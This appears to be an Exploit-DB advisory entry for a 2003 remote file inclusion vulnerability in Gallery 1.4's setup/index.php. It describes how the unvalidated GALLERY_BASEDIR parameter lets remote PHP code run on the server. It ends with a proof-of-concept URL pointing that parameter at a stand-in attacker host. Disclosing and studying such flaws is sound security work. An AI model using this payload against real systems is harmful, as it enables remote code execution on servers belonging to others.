Gallery 1.4 - 'index.php' Remote File Inclusion

EDB-ID:

23238


Author:

peter

Type:

webapps


Platform:

PHP

Date:

2003-10-11


source: https://www.securityfocus.com/bid/8814/info

It has been reported that Gallery is prone to a remote file include vulnerability in the index.php script file. The problem occurs due to the program failing to verify the location in which it includes the util.php script, when handling specific requests to index.php. As a result, an attacker may be capable of having arbitrary PHP script code being executed on the remote host with the privileges of the web server. 

http://www.example.org/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://www.attacker.com/